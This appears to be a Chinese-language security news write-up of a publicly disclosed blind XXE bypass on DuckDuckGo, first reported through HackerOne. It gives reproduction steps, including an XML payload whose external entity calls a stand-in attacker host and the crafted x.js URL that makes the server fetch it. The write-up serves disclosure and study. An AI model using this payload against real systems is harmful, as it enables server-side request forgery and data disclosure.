DuckDuckGo上Blind XXE漏洞防護繞過
近期,白帽匯安全研究院發現HackerOne網站公開了一個DuckDuckGo網站的XXE漏洞。該漏洞是以前一個DuckDuckGo網站XXE漏洞的新繞過方法,兩個漏洞的發現者為同一個人。(上個XXE漏洞說明:https://nosec.org/home/detail/2219.html)
DuckDuckGo強調在傳統搜尋引擎的基礎上引入各大Web 2.0站點的內容。其辦站哲學主張維護使用者的隱私權,並承諾不監控、不記錄使用者的搜尋內容。
——來自百度百科
以下為漏洞具體說明:
復現步驟
- 首先攻擊者在自己的外網伺服器上搭建web服務,並且放上一個文件內容如下的XXE攻擊文件(xml文件):
<?xm l version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext;
]>
<r></r>
- 攻擊者在瀏覽器上訪問
https://duckduckgo.com/x.js?u=http://attacker_host/xxe.xml
,其中http://attacker_host/xxe.xml
代表上一步的XXE攻擊文件: - 最後,攻擊者可在自己的伺服器上檢測到
http://attacker_host/Blind_xxe
被訪問,這說明攻擊者的xm l文件成功被DuckDuckGo解析。